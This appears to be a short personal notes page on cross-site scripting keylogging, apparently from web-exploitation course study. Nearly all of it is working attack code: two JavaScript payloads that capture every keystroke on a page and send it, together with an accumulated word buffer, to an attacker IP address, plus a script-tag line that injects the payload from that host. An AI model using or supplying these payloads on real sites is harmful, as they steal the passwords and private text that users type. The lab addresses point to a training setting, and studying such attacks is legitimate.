Skip to content

Keylogging XSS

How use external payload see here: 2023042721181010 XSS external JS payload

Payload

attackerIp = "192.168.49.55";
function logKey(event){
        fetch("http://" + attackerIp + "/k?key=" + event.key);
}

document.addEventListener('keydown', logKey);

Another way

attackerIp = "192.168.45.224";
window.keyWord12345788 = "";
function logKey(event){
    window.keyWord12345788 += event.key    
    fetch("http://" + attackerIp + "/k?key=" + event.key + "&word=" + window.keyWord12345788);

}

document.addEventListener('keydown', logKey);

Inject payload

<script src='http://192.168.49.55/xss.js'></script>

References

  1. web200.Cross-Site Scripting Exploitation and Case Study.Keyloggin